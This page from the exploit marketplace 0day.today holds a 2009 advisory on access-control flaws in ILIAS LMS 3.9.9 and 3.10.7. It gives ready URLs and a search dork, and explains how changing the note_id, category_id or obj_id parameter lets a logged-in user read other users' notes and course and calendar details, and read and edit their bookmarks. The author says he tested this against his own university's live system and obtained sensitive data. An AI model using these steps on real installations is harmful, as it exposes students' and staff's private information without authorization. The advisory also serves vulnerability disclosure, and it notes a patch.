0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
ILIAS LMS <= 3.9.9/3.10.7 Arbitrary Edition/Info Disclosure Vulns
================================================================= ILIAS LMS <= 3.9.9/3.10.7 Arbitrary Edition/Info Disclosure Vulns ================================================================= ---------------------------------------------------------------------------------------------- | MULTIPLE ARBITRARY INFORMATION DISCLOSURE AND EDITION | |--------------------------------------------------------------------------------------------| | | ILIAS LMS <= 3.10.7/3.9.9 | | | CMS INFORMATION: ----------------------------------- | | | |-->WEB: http://www.ilias.de/ | |-->DOWNLOAD: http://www.ilias.de/docu/goto.php?target=st_229_35&client_id=docu | |-->DEMO: http://www.demo.ilias-support.com/ | |-->CATEGORY: LMS/Education | |-->DESCRIPTION: ILIAS is a powerful web-based learning management system that allows you | | to easily manage learning resources in an integrated system. | |-->RELEASED: 2009-06-22 | | | | CMS VULNERABILITY: | | | |-->TESTED ON: firefox 3 | |-->DORK: "powered by ILIAS" | |-->CATEGORY: ARBITRARY INFORMATION EDITION/DISCLOSURE | |-->AFFECT VERSION: 3.10.7/3.9.9 | |-->Discovered Bug date: 2009-06-28 | |-->Reported Bug date: 2009-06-28 | |-->Fixed bug date: 2009-06-30 | |-->Info patch (3.10.8/3.9.10): http://www.ilias.de/docu/goto.php?target=st_229_35 | | &client_id=docu | |-->Author: YEnH4ckEr | |-->WEB/BLOG: N/A | |-->COMMENT: YEnH4ckEr <--<3--> Marijose. | | I'm going to rest for some time...J. Enrique y Pedro...wtf!?...algo sobre ILIAS!! ^_^ | ---------------------------------------------------------------------------------------------- <<<<---------++++++++++++++ Condition: registered user +++++++++++++++++--------->>>> I used my own account in my university...sorry for testing :P ################################# ///////////////////////////////// ARBITRARY INFORMATION DISCLOSURE ///////////////////////////////// ################################# ------------------- ------------------- "POST-ITS" ISSUE: ------------------- ------------------- When a user, teacher, admin, alumn, post a new post-its, he could read all post-its in database. The vuln link would be: http://[HOST]/[PATH]/ilias.php?col_side=right&block_type=pdnotes&rel_obj=0¬e_id=1¬e_type=1&cmd=showNote&cmdClass=ilpdnotesblockgui&cmdNode=50&baseClass=ilPersonalDesktopGUI Changing note_id=1 for other value, for ex. 100, we could read this posts-it. That seems a low risk vuln but, when i tested on-line, ie, against my university and i've got a lot of sensitive information. ------------------- ------------------- "CMD" ISSUE: ------------------- ------------------- Course/group/... calendars: This would be a normal link: http://[HOST]/[PATH]/repository.php?cmd=frameset&ref_id=50438 But if I change cmd=frameset for cmd=edit: http://[HOST]/[PATH]/repository.php?ref_id=50438&cmd=edit I access to information about this group/course/..., and I tried to change it, but i got permission denied...anyway, i can get how it's configured this group/course/... ------------------- ------------------- "CALENDAR" ISSUE: ------------------- ------------------- http://[HOST]/[PATH]/ilias.php?seed=2009-06-28&category_id=847&calendar_mode=2&cmd=edit&cmdClass=ilcalendarcategorygui&cmdNode=6&baseClass=ilPersonalDesktopGUI Changing category_id, it shows sensitive information about any course/group/... Personal and global calendars are secure. ######################################### ///////////////////////////////////////// ARBITRARY INFORMATION DISCLOSURE/EDITION ///////////////////////////////////////// ######################################### This module (favorite) allows to get a repository of favorite links ------------------- ------------------- "FAVORITE" ISSUE: ------------------- ------------------- This would be the vuln link: http://[HOST]/[PATH]/ilias.php?bmf_id=1&obj_id=926&cmd=editFormBookmark&cmdClass=ilbookmarkadministrationgui&cmdNode=2&baseClass=ilPersonalDesktopGUI GET var 'obj_id' is the vuln var...changing for other value you can view and edit any favorite link. User (victim) trusts in these links (He posts them) # 0day.today [2024-07-07] #